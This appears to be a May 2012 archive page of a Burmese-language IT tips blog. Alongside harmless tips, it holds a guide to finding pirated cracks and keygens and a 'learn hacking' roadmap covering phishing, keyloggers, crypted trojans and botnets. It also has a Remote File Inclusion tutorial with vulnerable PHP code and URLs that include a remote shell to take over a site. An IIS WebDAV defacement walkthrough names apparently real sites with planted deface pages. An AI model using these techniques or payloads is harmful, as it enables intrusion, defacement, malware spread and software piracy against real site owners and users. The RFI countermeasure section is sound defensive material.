IT Knowedge: May 2012

Thursday, May 31, 2012

(MY PASSWORD CARD)

အထက္တြင္ၿပထားေသာကတ္သည္ ပတ္စ၀က္ကတ္ၿဖစ္သည္။
- ၄င္းကတ္ၿဖင့္မိမိပတ္စ၀က္မ်ားကို လားရာဘက္ေပါင္းစံုမွ
မိမိစိတ္ၾကိဳက္မွတ္သားထားႏိုင္ေအာင္စီစဥ္ထားၿခင္းၿဖစ္သည္။
- ၄င္းကတ္သည္ခရက္တစ္ကတ္အရြယ္သာရွိ၍သယ္ေဆာင္ရလည္း
လြယ္ကူသည္။
- ၄င္းပတ္စ၀က္ကတ္ေပ်ာက္သြားခဲ့ေသာ္လည္း ကတ္နံပါတ္မွတ္မိပါက
အလြယ္တကူအစားၿပန္ရႏိုင္ပါေသးသည္။

လံုၿခံဳစိတ္ခ်ရေသာပတ္စ၀က္အတြက္ ကတ္တစ္ခုေလာက္ဖန္တီးလိုလွ်င္
ေအာက္ပါလင့္သို႔၀င္ေရာက္၍ၿပဳလုပ္ႏိုင္ပါသည္။

Speak notepad

NOTEPAD မွာမိမိရိုက္ထည့္သည္မ်ားကို အသံထြက္
စကားေၿပားခိုင္းေစလိုလွ်င္ ေအာက္ပါကုတ္ကိုႏုတ္ပတ္ထဲကူးယူ၍
.VBS ႏွင့္သိမ္းေပးလိုက္ပါ။
- I LOVE YOU ေနရာတြင္ႏွစ္သက္ရာစာသားမ်ားအစားထုိးႏိုင္ပါသည္။
- ပိတ္ခ်င္လွ်င္ TASK MANAGER သံုး၍ပိတ္ႏိုင္ပါသည္။

Do
Dim msg, sapi
msg="1437 = I Love You"
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
loop

(SPEED UP COMPUTER SYSTEM WITH USB STICK)

RAM ကို USB STICK ထဲရွိမမ္မိုရီအား ခြဲေ၀သံုးစြဲေစေသာနည္းၿဖင့္
COMPUTER SYSTEM ကို SPEED ၿမွင့္တင္ႏိုင္ပါသည္။
အဆင့္ (၁) ကြန္ပ်ဴတာထဲသို႔ USB ထိုးထည့္ၿပီးေနာက္
AUTO PLAY ေပၚလာလွ်င္ SPEED UP MY PC ကိုေရြးပါ။
အဆင့္ (၂) READY BOOST TAB ထဲမွာ use this device ကို
check ေပးလိုက္ပါ။

မွတ္ခ်က္ ။ ။ window vista ႏွင့္ window 7 သာလွ်င္။

Monday, May 28, 2012

JAVA Developer's Guide ( ျမန္မာ )

ကၽြန္ေတာ္ဟိုးအရင္တုန္းက အဂၤလိပ္ ဘာသာေတြနဲ႔စာအုပ္ေတြ Video Tutorials ေလးေတြကို တင္ေပးခဲ႔ ၿပီးပါၿပီ။အခုေတာ႔ ျမန္မာလို ေလ႔လာႏုိင္ရန္အတြက္ ဒီစာအုပ္ေတြကို တင္ေပးလိုက္ပါတယ္။ စာအုပ္ေပါင္း 60 အုပ္တိတိရွိပါတယ္။ ကၽြန္ေတာ္တို႔ ေခါင္းစဥ္ေတြနဲ႔ အတူတူ အေသးစိတ္ျမန္မာ လိုေလ႔လာႏုိင္ေအာင္ ေရးေပးထားပါတယ္။ တင္ရတာလည္း နည္းနည္းအခက္အခဲေလးရွိတာေၾကာင္႔ ကၽြန္ေတာ္ စာအုပ္အားလံုးကို Mediafire တစ္ခုထဲမွာပဲ စုၿပီးတင္ေပးထားပါတယ္။ တစ္ကယ္လို႔ လင္႔ခ္ေလးေတြ ေသသြားခဲ႔တယ္ဆိုရင္ ကၽြန္ေတာ္အေသးစိတ္ျပန္ျပင္ေပးပါ႔မယ္။ ကၽြန္ေတာ္လည္းတင္ၿပီး သား အဆင္သင္႔မရွိတာနဲ႔ ကၽြန္ေတာ္႔အစ္ကို ကိုသန္႔ဇင္ေဌး Upload တင္ထားတာရွိတာနဲ႔ ကၽြန္ေတာ္႔ မိတ္ေဆြေတြ အဆင္သင္႔ေလး ဖတ္ႏုိင္ေအာင္ တင္ေပးလိုက္တာပါ။ စာအုပ္ဆိုဒ္ေလးေတြက လည္း ဘယ္ေလာက္မွမရွိပါဘူး။ ေအာက္မွာ ကၽြန္ေတာ္ အပိုင္းလိုက္ခြဲတင္ေပး ထားပါတယ္..။ ယူသြားလိုက္ပါဗ်ာ.။။

အပိုင္းအလိုက္ ခြဲတင္ေပးထားပါတယ္.။ ေအာက္မွာ ယူသြားလိုက္ပါဗ်ာ.။

Java Script

စာအုပ္စုစုေပါင္း 60 ရွိပါတယ္။ အားလံုးပဲ က်န္းမာေပ်ာ္ရႊင္ႏုိင္ၾကပါေစလို႔ ကၽြန္ေတာ္ ဆုေတာင္းေပးလိုက္ပါတယ္.။ ေက်းဇူးတင္ပါတယ္ခင္ဗ်ာ။.။ ^_^

Google ထဲတြင္ crack ဖိုင္ေတြ serial ေတြ Keygen ေတြကို မိမိကိုယ္တိုင္ ရွာေဖြတတ္ေစဖို႔ လမ္းညြန္

ဘာ software မွမသုံးပဲ crack, serial, keygen ေတြကို Googleမွာကိုယ္တိုင္ရွာခ်င္သူေတြ အတြက္ပါ…သိၿပီးတဲ႔သူေတြအတြက္ေတာ႔ လြယ္ေပမဲ႔ မသိေသးသူေတြအတြက္ share ေပးလိုက္ တာပါ….ရွွာနည္းက…search engine မွာက်ေနာ္တို႔ရွာခ်င္တဲ႔ software အမည္ကို double code ေလးခံၿပီး space ေလးၿခားၿပီး 94fbr လို႔ရုိက္ၿပီး enter ေခါက္ လိုက္ပါ… crack… ,keygen…serial ေတြက်လာပါလိမ္႔မယ္………..ကိုယ္အဆင္ေၿပတဲ႔ ဆိုဒ္ကို ေရြးၿပီး သြား ေဒါင္းလိုက္ယံုပါပဲ… ေအာက္မွာေဖာ္ျပထားေသာ ပံု – ၁ ကို ၾကည့္ပါ။

ေအာက္ေဖာ္ျပပါ ပံုတြင္ျပထားသည့္အတိုင္း search ဒါမွမဟုတ္ enter ေခါက္လိုက္တာနဲ႔ ပံု ၂ တြင္ ျပထားသည့္အတိုင္း က် လာပါလိမ့္မည္။ အဆင္ေျပတဲ့ဆိုဒ္ေတြမွာ ရွာေဖြေမြေႏွာက္ၿပီး ေဒါင္း လိုက္ၾကပါေတာ့။

G-mail password ဖ်က္နည္း

အလကားရတိုင္း account ေတြအမ်ားၾကီးဖြင့္ျပီး စိတ္ရႈပ္ေနတဲ့ သူငယ္ခ်င္း
ကိုကို မမ ညီငယ္ ညီမငယ္ မ်ားအတြက္
အသံုး၀င္မယ္ထင္ပါတယ္။ G-mail ကိုဘယ္လုိဖ်က္မလဲ…..
အခမဲ႔ရတဲ႔ G-mail ေတြသင္႔မွာမ်ားေနၿပီ..က်ဴခံရတာမ်ားလို႔စိတ္ညစ္လို႔ပဲျဖစ္ျဖစ္
ဒါမွမဟုတ္ ကိစၥတစ္ခုခုေၾကာင္႔ ဖ်က္ခ်င္တာပဲျဖစ္ျဖစ္ ဖ်က္ၾကည္႔ရေအာင္…………
-Google Account Settings ဆီကိုသြားပါ။Edit ထဲကိုအရင္သြားလိုက္ေနာ္ ၿပီးရင္.
-Delete a Service ေအာက္က Delete G-mail Service ကို Click ပါ။
ဒီေနရာမွာ Close account and delete all service and info associated
with it ကိုေရြးလည္းရပါတယ္။ဒီီလိုေရြးခ်ယ္မယ္ဆိုရင္
ဖ်က္ခ်င္တဲ႔အေကာင္႔နဲ႔သက္ဆိုင္သမွ်
i-google ,Google Docs စတာေတြပါ ပါသြားမွာပါ။
-Yes ,I want to permanently delete *******@gmail.com and
remove from my google account ကိုေရြးပါ။
-New Email Address ေနရာမွာ သင္႔ရဲ႕ အီးေမးလ္ လိပ္စာတစ္ခုခုအသစ္ေရးပါ။
G-mail က Secondary email ကိုသတင္းေပးရာမွာ အသံုးျပဳလို႔ပါ။ ဒီ E-mail က
Google အတြက္ သင္႔မူပိုင္ပါပဲ။
-ဖ်က္ျပစ္လိုက္တဲ႔ E-mail ရွိ ၊မရွိ ေစာေစာေလးက ေပးထားခဲ႔တဲ႔ Mail
မွတစ္ဆင္႔ျပန္စစ္ၾကည္႔ပါဦး။
-Current Password ေအာက္က G-mail Password ကို၀င္ပါ။
-Remove G-mail ကိုေရြးပါ။
-Account-neroplyegoogle.com မွ Confirmation ကို သင္ေပးခဲ႔တဲ႔
Secondary�account မွာ ဖြင္႔ၾကည္႔ပါ။
-Deletion Link ကို၀င္ပါ။
-Password ရိုက္ထည္႔ပါ။ၿပီးရင္ Verify: ေပါ႔။
OK ၿပီေနာ္…..
ေလးစားစြာျဖင္. ........

how to learn hacking

က်န္ေတာ္ လိုhacking ပညာ ကုိ စိတ္၀င္စားတဲ. သူငယ္ခ်င္းေတြ အတြက္တင္ေပးလိုက္ပါတယ္။
Hacking ကို ဘယ္သူ႕ဆီက သင္ၾကားရမလဲ?

Learn From Google . Google မွာအားလံုးရွိပါတယ္ အဂၤလိပ္စာေတာ့ဖတ္ရလိမ့္မယ္ ဒါေပမယ့္တကယ္စိတ္၀င္စားတဲ့သူက ရွာဖတ္မွာပါပဲ

ဘယ္လိုသင္ၾကားမလဲ?

Hacking ကို Level ငါး ခုနဲ႕Self-Study လုပ္ရပါ့မယ္.။

Level 1: Email Attacking
Level 2: Website and Forum Hacking

Level 3: Trojans

Level 4: Botnets & Zoombies

Level 5: Penetration.

Level 1:Email Attacking

Phishing နဲ႕စၾကခဲ့တာ Hacker တိုင္းရဲ႕ပထမေျခလွမ္းပါ.။　ျပီးေတာ့　Keylogger ေလးဘာေလးနဲ႕စမ္းမယ္ေပါ့ဗ်ာ.။　ဒါ　ဟက္ကာတုိင္းလုပ္ခဲ့ဖူးပါတယ္.။　 Google မွာ　How to Hack Emails ဆိုျပီးရွာဖတ္ၾကေပါ့ဗ်ာ　 :-D

Level 2:Website Hacking & Forum Hackings

ကၽြန္ေတာ္ကေတာ့ 　ပထမဆံုး　SQLI ကို　Havij နဲ႕စေဖာက္ၾကည့္ပါတယ္　ခက္တာမွမဟုတ္တာ　ကလစ္ရံုပဲကိုး　ဟီး　 :-D ျပီးေတာ့　RFI အေၾကာင္းရွာဖတ္ပါတယ္　Remote File Inclusion ခက္တာမွတ္လို႕ Shell Link ကေလး ခ်ိတ္ေပးရံုကိုး.. :-P

ျပီးေတာ့ LFI , XSS , SQLI Manually , RCE , XML , CRFL အစရွိသျဖင့္ ဆက္တုိက္ ဖတ္သြားပါတယ္ ( ေနာက္ပိုင္းကၽြန္ေတာ္ တစ္ခုခ်င္းစီကို အေသးစိတ္ ေရးထားတဲ့ Ｔｕｔｏｒｉａｌ　ေလးေတြတင္ေပးပါ့မယ္ ေၾကာ္ျငာ :-Ｐ) အဲ့ဒါေတြအားလံုးသိတဲ့အခါ ကၽြန္ေတာ္ PHP ကို ေလ့လာျဖစ္ပါတယ္ ေနာက္ပိုင္း Advanced Technique ေတြ လိုက္ ဖတ္ျဖစ္ပါတယ္ PHP Myadmin ကေန Shell တင္ၾကည့္တာတုိ႕ .. Shell Encrypt လုပ္တာတုိ႕ Shell filter ကိုေက်ာ္ျပီးတင္တာတို႕ အျပင္ Mysql User အသစ္ေဆာက္တာတို႕ Htaccess ေက်ာ္တာတို ႕Backconnect ခ်ိတ္တာတို႕ေပါ့ဗ်ာ ဒီေကာင္က နည္းနည္းေတာ့ က်ယ္ျပန္႕တယ္ ေနာက္ပိုင္း လုပ္ရင္းလုပ္ရင္း အေတြ႕အၾကံဳ က သင္သြားတာေတြလည္း အမ်ားၾကီး ေနာက္ပိုင္းေတာ့ Website & Forum Hacking ကိုပဲ သီးသန္႕ ေဆာင္းပါးေလးတစ္ပုဒ္ေရးေပးခ်င္ပါေသးတယ္ :-)
Level 3 : Trojans

ကၽြန္ေတာ္ပထမဆံုး စသံုးဖူးတဲ့ Trojan က Prorat ဗ် အမွန္အတိုင္းေျပာရရင္ Prorat ကအေတာ္လြယ္တယ္..အေတာ္လည္းခ်ာတယ္ Victim IP ကိုသိရတယ္ Port Forward ေတာ့လုပ္ဖို႕မလိုဘူးေပါ့ ေနာက္ပိုင္း အစံုသံုးလာမိတယ္ ေတာ္ေတာ့ကို စံုတယ္ဗ် ကၽြန္ေတာ္ ့ အိပ္မက္က Server ေတြကို ေဖာက္ထြင္းမယ္ ျပီးရင္ Backdoor Trojan ေတြထားခဲ့မယ္ ဒီလိုဗ် :-D စိတ္ကူးယဥ္ဆန္လြန္းတယ္ေပါ့ဗ်ာ ေနာက္ပိုင္း Trojan ေတြကို Anti-virus ေတြ မသိေအာင္ Crypt လုပ္လို႕ရတယ္ဆိုတာသိလာတယ္ ဒါနဲ႕ သူမ်ားေတြ ေပါေပါပဲပဲေပးတဲ့ Crypter ေတြသံုးၾကည့္တယ္ အဆင္ေျပတဲ့ဟာက ေျပေပမယ့္ မေျပတဲ့ဟာကမ်ားပါတယ္ ဒါနဲ႕ Crypter Source Code ေတြလိုက္စုတယ္　သူမ်ားေရးထားတဲ့　Source Code ေတြေပါ့　Compile　လုပ္ၾကည့္တယ္　ကၽြန္ေတာ္　တတ္တဲ့　C++ တို႕　C တို႕နဲ႕ဆို　ဖတ္ႏုိင္ေအာင္ၾကိဳးစားမိတယ္　

Level 4 : Botnets & Zoombies

ဒီေနရာမွာ Botnet နဲ႕ပတ္သတ္တဲ့　သီအိုရီနည္းနည္းရွင္းျပခ်င္တယ္ဗ်　သိၾကတဲ့အတုိင္းပဲ　Botnet ဆိုတာ　Zoombie အစုအေ၀း.။အဲ့ဒီ့　Zoombie ေတြကို　IRC တစ္ခုထဲကေန　ခ်ိတ္ျပီး　Command ေပးတယ္　Operator ကေနေပါ့.။　Zoombie ေတြမွာသြားကပ္တဲ့　Bot မွာ　ႏွစ္မ်ိဳးရွိတယ္ဗ် Http Bot နဲ႕　Exe Bot ဆုိျပီး　Http Bot ဆိုတာ　၀က္ဘ္ဆိုဒ္ေတြမွာသြားကပ္တယ္　 :-D Website Host ေတြေတာင္ Bot အကပ္ခံရတဲ့ ဘ၀ေနာ္ သူကေတာ့ Perl , PHP ေတြနဲ႕ေရးတယ္ေပါ့ဗ်ာ။ Exe Bot ကေတာ့ Trojan ေတြလို စက္ေတြမွာသြားကပ္တယ္ေပါ့ဗ်ာ.။ေျပာရရင္ Ddos လုပ္ႏုိင္ဖို႕ Networking ကိုေကာင္းေကာင္းသိဖို႕လုိတယ္ အခုေတာ့ သီအိုရီေလာက္ပဲရွင္းျပႏုိင္လိမ့္မယ္ဗ်ာ ဒါဆိုလည္း အေထာက္အကူျပဳမွာပါ :-P

Level 5 : Penetration

ေလာေလာဆယ္ေတာ့ ကၽြန္ေတာ့္မွာ Penetration အေတြ႕အၾကံဳသိပ္မရွိလွေသးတ့ဲအတြက္ ေရးရမွာ လက္မရဲဘူးျဖစ္ေနတယ္ ေလာေလာဆယ္ေတာ့ Window Server Exploit ေတြဖတ္ျပီး လက္တည့္စမ္းေနဆဲပဲရွိေသးတယ္ေနာက္ပိုင္း ဒီထက္ပိုျပီးတင္ေပးခ်င္ပါေသးတယ္ :-)

ေဆာင္ရန္ေရွာင္ရန္မ်ား

Hacking Self-Study လုပ္ေနတဲ့ လူူတစ္ေယာက္အတြက္ ေဆာင္ရန္ေရွာင္ရန္ေလးေတြပါ

Never ask how to hack,Never Say you are a hacker

ကၽြန္ေတာ့္လက္သံုးစကားပါ နည္းနည္းေလးတတ္တာနဲ႕ ေလွ်ာက္ျပီး ဟက္ကာျဖစ္ျပီကြ ဆိုျပီးမေအာ္ပါနဲ႕　တိတ္တဆိတ္　သင္ယူပါ　တိတ္တဆိတ္ေလ့လာပါ　 ;-)

မၾကြားနဲ႕

Facebook လိုေနရာမ်ိဳးမွာ　ငါ　ဒီေကာင့္ကိုဟက္ပစ္တယ္　ဆိုျပီးၾကြားတာ　ကေလးဆန္တဲ့အျပဳအမူေတြပါ　ရင့္က်က္ေအာင္သင္ၾကားပါ.။
Not ask people,Ask Google

လူတစ္ေယာက္က္ုိ　မေမးရဘူးမဟုတ္ပါဘူး　ဒါေပမယ့္　အစအဆံုးမေမးပါနဲ႕　Google မွာ　သင္ေမးတဲ့လူေျဖႏုိင္တာထက္　ပိုေကာင္းတဲ့　အေျဖေတြရွိေနပါမယ္　 ;-)

လက္မေလွ်ာ့ပါနဲ႕

ကၽြန္ေတာ္ကိုယ္တိုင္လည္းျဖစ္ဖူးခဲ့ပါတယ္ 　Website Hacking ဟိုဟာသိလား　သိတယ္　ဂဃဏနသိလား　သိဘူး　ဒီေတာ့　အခ်ိန္အလကားကုန္သြားပါတယ္　 တစ္ခုကိုျပီးေအာင္လုပ္ပါ　ျပီးမွ　တစ္ခုကူးပါ　တစ္ခုမျပီးပဲ　တစ္ခုမကူးပါနဲ႕　 အခ်ိန္ေတြကုန္သြားလိမ့္မယ္　ကိုယ္ေတြ႕မို႕ေျပာျပေနတာပါ

ေဆာင္းပါးကနည္းနည္းရွည္သြားတယ္ထင္ပါတယ္ 　ဒါေပမယ့္　အသံုး၀င္လိမ့္မယ္လို႕　ထင္ပါတယ္　Black လုပ္ပါ　White လုပ္ပါ　လို႕　ကၽြန္ေတာ္မေျပာလိုဘူး　ဒါေပမယ့္　နာမည္ၾကီးဖို႕အတြက္　 ကိုယ့္လူမ်ိဳးကို　ဒုကၡမေပးပါနဲ႕　နာမည္သိပ္ၾကီးခ်င္ရင္　Google ကုိ　Hack ပါ　လက္ကျမင္းစရာ　ႏုိင္ငံျခားဆိုဒ္ေတြအမ်ားၾကီးရွိပါတယ္　ေက်းဇူးတင္ပါတယ္

RFI Hacking

RFI Hacking ဆိုတာ ေလးကို အရင္ေျပာပါ့မယ္.။ RFI Hacking ရဲ ႔အရွည္က Remote File Inclusion ျဖစ္ျပီး Remote ဆိုတဲ့အတုိင္း Website တစ္ခုကို အျခား Website ကေန ထိန္းခ်ဳပ္ျခင္းပါ..
ပထမဦးဆံုး Exploit Code ကိုအရင္ၾကည့္ရေအာင္…။
PHP Code:
$page = $_GET['page'];
include(“”.$page.”.html”);
include Command က တဆင့္ တျခား Website က Webpage ကို ကူးယူႏိုင္တဲ့ Vuln ကို ျဖစ္ေစပါတယ္..။ ဥပမာ…Website တစ္ခုမွာ
1.Music
2.Video
3.contact ဆိုတဲ့ Page သံုးခုရွိမယ္ဆိုပါစို႔…။ Index ေကာပါရင္ ေလးခုေပါ့ဗ်ာ.။ ဒီေတာ့
1.music.php
2.video.php
3.contact.php
4.index.php ဆိုျပီး ေလးခုရွိပါမယ္ ( Index Page မွာေတာ့ Page Header ေတြ Footer ေတြ ပါမယ္ေပါ့ဗ်ာ..)
အဲ့ဒီ့ Page ေလးခုကို သြားခ်င္ရင္ -
http://www.target.com/index.php

http://www.target.com/index.php?=music.php
http://www.target.com/index.php?=video.php
http://www.target.com/index.php?=contact.php ဆိုျပီး သြားရပါလိမ့္မယ္.။
ဒီလို ဘာလို႔ သြားလို႔ရတာလဲဆိုတာကို ေျပာဖို႔ Vuln ျဖစ္ေနတဲ့ Index Page ရဲ ႔ Code ေလးကိုၾကည့္ရေအာင္..။

PHP Code:
//html for header
//html for menu
<?php
$page = $_GET['page'];
include($page); ?>
//html for footer
php Code ရဲ ႔ Line No.2 ကိုၾကည့္လို္က္ပါ. Get Method ကို ေတြ ႔ပါလိမ့္မယ္.။ အဲ့ဒီ့ Get Method ေၾကာင့္ ကၽြန္ေတာ္တုိ ႔ Page ေတြကိုသြားတဲ့အခါမွာ
http://www.target.com/index.php?=video.php လို႔ သြားခြင့္ရွိတာပါ..။ Coding မွာ ၾကည့္လိုက္ပါ.. လိုင္း နံပတ္ ၅ က include ေၾကာင့္ video Page မွာ Copy ကူးျပီး Index မွာ video.php အေနနဲ႔ တက္လာတာပါ..။ ဒါေပမယ့္ အဲ့ဒီမွာၾကည့္လိုက္ပါ page ကို Variable ေၾကညာမထားပါ ဒါက အၾကီးမားဆံုး Security အမွားၾကီးပါ.။ ဒီသေဘာအရဆို တျခား အေ၀းက Website တစ္ခု ကိုေကာ Copy ကူးျပီး index မွာလာခ်ိတ္လို႔ ေကာ မရဘူးလားလို ႔ ေမးလာရင္ ရပါတယ္
http://www.target.com/index.php?=http://www.google.com/? လို႔ သာ ရိုက္လိုက္ရင္ google Page ဟာ Copy ကူးျပီး Index Page မွာ တက္လာပါေတာ့တယ္
google မဟုတ္ဘဲ တျခား ၾကိဳက္တဲ့ Page တင္လို႔ရတာေၾကာင့္ ကၽြန္ေတာ္တို႔ ဟာ shell link ကုိ ထည့္ျပီး Target Website ကိုထည့္ခ်ဳပ္လိုက္ပါေတာ့တယ္.။ ေအာက္မွာၾကည့္ပါ..။
http://www.target.com/index.php?page=ht ... /shell.txt ဆိုျပီး ခ်ိတ္လိုက္တာနဲ႔ Text File အေနနဲ႔ သိမ္းဆည္းထားတဲ့ Shell ကို excute လုပ္ျပီး Target Website ေပၚမွာ လာ Run တဲ့ အတြက္ ကၽြန္ေတာ္ဟာ Target ရဲ ႔ Website ကို ထိန္းခ်ဳပ္ ခြင့္ရွိသြားပါျပီ..။
RFI Exploit ျဖစ္ေစတဲ့ အျခား ဥပမာ တစ္ခုကို ထပ္ျပီး တင္ျပပါ့မယ္..။ Undefined Variable ပါ..။ Programming ကို Basic ေလာက္ နားလည္တဲ့လူဆိုရင္ေတာ့ Variable ဆိုတာ ဘာလဲ လို႔ ထပ္ရွင္းျပဖို႔ မလုိေတာ့ပါဘူး ဒီေနရာမွာ Hacking Method ကို ပဲ ေျပာျပမွာ ျဖစ္လို႔ Variable ဆိုတာ ကို ရွင္းျပမေနေတာ့ပါဘူး..။
Developer တစ္ေယာက္ဟာ သူ ႔ ရဲ ႔ Website ကို သူ ႔ရဲ ႔ Mysql Server နဲ ႔ ခ်ိတ္ဆက္ခ်င္ပါတယ္.။ ဥပမာ..သူ ႔ ဆိုဒ္ Index Page မွာ Content ေတြ ကို Mysql နဲ႔ ခ်ိတ္ထားခ်င္တယ္ဆိုပါစို႔. Mysql Server ကို ခ်ိတ္ဆက္ဖို႔ဆိုရင္ User Name နဲ ႔ Password တစ္ခု လို္အပ္ပါလိမ့္မယ္..။ အဲ့ဒီ့ User Name နဲ႔ Password ကို db_details.php ဆိုတဲ့ File ထဲမွာ သိမ္းထားပါတယ္.။
တကယ္လုိ ႔ ကၽြန္ေတာ္တို႔ဟာ video.php ဆိုတာကို index Page က တစ္ဆင့္ ဖြင့္တယ္ဆိုပါစို႔ဗ်ာ.။
http://www.target/index.php?page=video.php

တကယ္လို႔ အဲ့ဒီ့ Page က PHP Code ကိုၾကည့္မယ္ဆိုရင္..
PHP Code:
//html for header
//html for menu
<?php
$database_config_file = “db_details.php”;
$page = $_GET['page'];
include($page);
?>
//html for footer <?php
include($database_config_file);
//code to connect to MySQL and get the latest updates
?>
Index Page မွာ $database_config_file ကို db_detils.php နဲ႔ ခ်ိတ္ထားတာကို ေတြ ႔ရပါမယ္..။ ဒါေပသိ ကၽြန္ေတာ္ တို ႔ ခုေရာက္ေနတဲ့ ေနရာက video.php ျဖစ္တဲ့အတြက္ အဲ့ဒီ့ db_detils.php နဲ႔ခ်ိတ္ဖို႔ မလိုအပ္ပါဘူး..ဒီေနရာမွာ လာခ်ိတ္ေနတာေတြ ႔ ရ မွာပါ..။ အဲ့ဒီ့ ေနရာမွာ ျပႆနာ တက္သြားတာပါ..။ ဒီေတာ့ ထံုးစံ အတိုင္း ကၽြန္ေတာ္တို ႔ရ ဲ ႔ Shell Link ကို ခ်ိတ္ခြင့္ရွိသြားပါျပီ..။
http://www.target/index.php?page=http:/ ... /shell.txt ေပါ့ဗ် 

RFI Hacking Technique ကေတာ့ ဒီေနရာမွာ ျပီးသြားပါျပီ..။ ေအာက္ဟာကေတာ့ Countermeasure ေလးပါ..။
Countermeasure

ေရွ ႔မွာ သီအိုရီ ေျပာခဲ့တဲ့ အတိုင္း include Method ေၾကာင့္ Copy ကူးျပီး Get နဲ႔ လွမ္းယူလိုက္တာျဖစ္တဲ့အတြက္ ဘယ္ကဟာကို လွမ္းယူရမယ္ဆိုတာ အတိအက် ေျပာေပးလိုက္ရင္ ကူးခ်င္တဲ ့ ဆိုဒ္ကို Copy ကူးခြင့္ေပးမွာ မဟုတ္ဘဲ တိတိက်က် ျဖစ္သြားမွာပါ 
PHP Code
<?php
$page = $_GET['page'];
switch($page){
case “videogames”;
include(“videogames.php”);
break;
case “contact”:
include(“contact.php”);
break;
case “music”:
include(“music.php”);
break;
default: //A page wasn’t chosen, or one that wasn’t “home” or “gallery”
echo “Choose a page from our fine selection!1!!”;
break;
}
?>
အခုဆိုရင္ RFI Hacking ကို ေသေသခ်ာခ်ာ နားလည္ သြားေလာက္ျပီ ထင္ပါတယ္…။
အားလံုး အဆင္ေျပၾကပါေစ…။

iis Hacking tutorial

IS hacking ဟာ website ေတြကို hack ဖို႔အတြက္ အလြယ္ကူဆံုးနည္းလမ္းတစ္ခုျဖစ္ပါတယ္.deface page အလြယ္တကူတင္ႏိူင္ပါတယ္...Start ထဲက run ကိုသြားပါ...
run box ထဲမွာ %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F} လို႔ရိုက္ထည္႔ျပီးရင္ Enter ေခါက္ပါ...Web Folder လို႔ေခၚတဲ႔ Folder တစ္ခုက်လာပါလိမ္႔မယ္...

Right Click ေထာက္ျပီးေတာ႔ New<<Web Folder ကို ေရြးပါ...
Vulnerability Site Link ကို Type the location to add ေနရာေလးမွာထည္႔ျပီး next ကို ႏွိပ္ပါ...Finish ကို ႏွိပ္ပါ...

Folder ေပၚလာပါျပီ...Folder ကို ဖြင္႔ျပီး ကိုယ္႔ deface page ကို ကူးထည္႔ရံုပါပဲ...Vulnerability ေပါက္တယ္ ဆိုရင္ folder ထဲမွာ ကိုယ္ထည္႔လိုက္တဲ႔ file ေပၚေနပါလိမ္႔မယ္....ေနာက္ျပီး အဲ file ရဲ႔ url ကို ျပန္ေခၚၾကည္႔ခ်င္ရင္ေတာ႔ www.site.com/yourfile.ext ဆိုတာေလးနဲ႔ျပန္ေခၚၾကည္႔ရမွာျဖစ္ပါတယ္...

ဒါကေတာ႔ IIS ေပါက္ေနတဲ႔ site မ်ားပါ...Tutorial အေနနဲ႔ စမ္းၾကည္႔ၾကေပါ႔ဗ်ာ... :mrgreen:

http://www.shop574.com
deface link : http://www.shop574.com/h4ck3r1989.html

http://axoneservices.com
deface link : http://axoneservices.com/h4ck3r1989.html